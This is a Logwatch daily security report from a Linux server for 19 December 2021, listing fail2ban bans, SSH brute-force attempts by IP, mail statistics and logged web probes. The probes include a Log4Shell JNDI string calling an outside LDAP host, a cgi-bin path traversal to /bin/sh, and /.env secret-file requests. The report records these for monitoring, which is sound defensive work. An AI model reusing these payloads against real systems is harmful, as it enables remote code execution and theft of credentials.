[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Mon Dec 20 04:42:05 2021 Date Range Processed: yesterday ( 2021-Dec-19 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 28:28 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 5 sites probed the server 109.74.204.123 161.35.230.3 61.219.11.151 64.227.99.233 66.240.205.34 Requests with error response codes 400 Bad Request null: 8 Time(s) mstshash=Domain: 4 Time(s) /: 3 Time(s) /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 2 Time(s) default.asp: 2 Time(s) mstshash=Administr: 2 Time(s) /.env: 1 Time(s) /10196510: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s) /config/getuser?index=0: 1 Time(s) /manager/text/list: 1 Time(s) 7: 1 Time(s) \xBB: 1 Time(s) }\xD1>\xD8\x8E\xD1{\x1D\xFC\xF2kr\xC6\x01\ ... xBE\x00\xBD\xC0: 1 Time(s) 500 Internal Server Error /: 21 Time(s) /.env: 3 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D: 1 Time(s) /GponForm/diag_Form?style/: 1 Time(s) /actuator/health: 1 Time(s) /favicon.ico: 1 Time(s) /owa/: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (101.96.76.242): 43 Time(s) root (1.116.25.72): 41 Time(s) root (121.201.34.21): 34 Time(s) root (211.157.148.2): 33 Time(s) root (162.243.20.232): 31 Time(s) root (1.14.49.221): 30 Time(s) root (211.219.114.39): 27 Time(s) root (119.29.60.96): 25 Time(s) root (125.141.139.7): 25 Time(s) unknown (162.243.20.232): 19 Time(s) root (111.198.33.54): 17 Time(s) root (139.198.13.109): 17 Time(s) unknown (139.198.13.109): 17 Time(s) unknown (121.201.34.21): 16 Time(s) unknown (211.157.148.2): 16 Time(s) root (114.67.116.17): 15 Time(s) unknown (1.14.49.221): 14 Time(s) unknown (119.29.60.96): 12 Time(s) unknown (211.219.114.39): 11 Time(s) root (183.194.212.16): 10 Time(s) root (120.92.79.133): 7 Time(s) unknown (101.96.76.242): 7 Time(s) unknown (111.198.33.54): 7 Time(s) unknown (1.116.25.72): 6 Time(s) unknown (114.67.116.17): 6 Time(s) unknown (125.141.139.7): 6 Time(s) unknown (183.194.212.16): 6 Time(s) root (115.221.81.85): 4 Time(s) root (220.179.231.222): 4 Time(s) unknown (120.92.79.133): 4 Time(s) root (121.66.109.90): 3 Time(s) root (36.110.228.254): 3 Time(s) unknown (182.48.114.140): 3 Time(s) root (40.125.214.159): 2 Time(s) unknown (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 Time(s) unknown (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 Time(s) news (125.141.139.7): 1 Time(s) root (114.7.162.198): 1 Time(s) root (36.91.61.178): 1 Time(s) unknown (115.221.81.85): 1 Time(s) unknown (116.52.144.172): 1 Time(s) unknown (220.179.231.222): 1 Time(s) unknown (36.133.163.35): 1 Time(s) unknown (40.125.214.159): 1 Time(s) unknown (45.141.84.10): 1 Time(s) Invalid Users: Unknown Account: 160 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 5 Miscellaneous warnings 13.067K Bytes accepted 13,381 13.067K Bytes sent via SMTP 13,381 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 29 Connections 11 Connections lost (inbound) 29 Disconnections 1 Removed from queue 1 Sent via SMTP 1 SMTP dialog errors ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 1.14.49.221: 30 times 1.116.25.72: 41 times 36.91.61.178: 1 time 36.110.228.254: 3 times 40.125.214.159: 2 times 101.96.76.242 (ci96.76-242.netnam.vn): 43 times 111.198.33.54: 17 times 114.7.162.198 (114-7-162-198.resources.indosat.com): 1 time 114.67.116.17: 15 times 115.221.81.85: 4 times 119.29.60.96: 25 times 120.92.79.133: 7 times 121.66.109.90: 3 times 121.201.34.21 (121.201.34.21): 34 times 125.141.139.7: 26 times 139.198.13.109: 17 times 162.243.20.232: 31 times 183.194.212.16 (.): 10 times 211.157.148.2: 33 times 211.219.114.39: 27 times 220.179.231.222: 4 times Illegal users from: 2001:470:1:c84::16: 1 time undef: 120 times 1.14.49.221: 14 times 1.116.25.72: 6 times 31.19.217.237 (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 times 36.133.163.35: 1 time 40.125.214.159: 1 time 45.83.66.144: 1 time 45.141.84.10: 1 time 64.62.197.152: 1 time 101.96.76.242 (ci96.76-242.netnam.vn): 7 times 109.74.204.123 (li151-123.members.linode.com): 1 time 111.198.33.54: 7 times 114.67.116.17: 6 times 115.221.81.85: 1 time 116.52.144.172: 1 time 119.29.60.96: 12 times 120.92.79.133: 4 times 121.201.34.21 (121.201.34.21): 16 times 125.141.139.7: 6 times 139.198.13.109: 17 times 162.243.20.232: 19 times 182.48.114.140: 3 times 183.194.212.16 (.): 6 times 193.169.254.138: 1 time 207.161.138.65 (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 times 211.157.148.2: 16 times 211.219.114.39: 11 times 220.179.231.222: 1 time **Unmatched Entries** fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s) Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s) Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s) Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################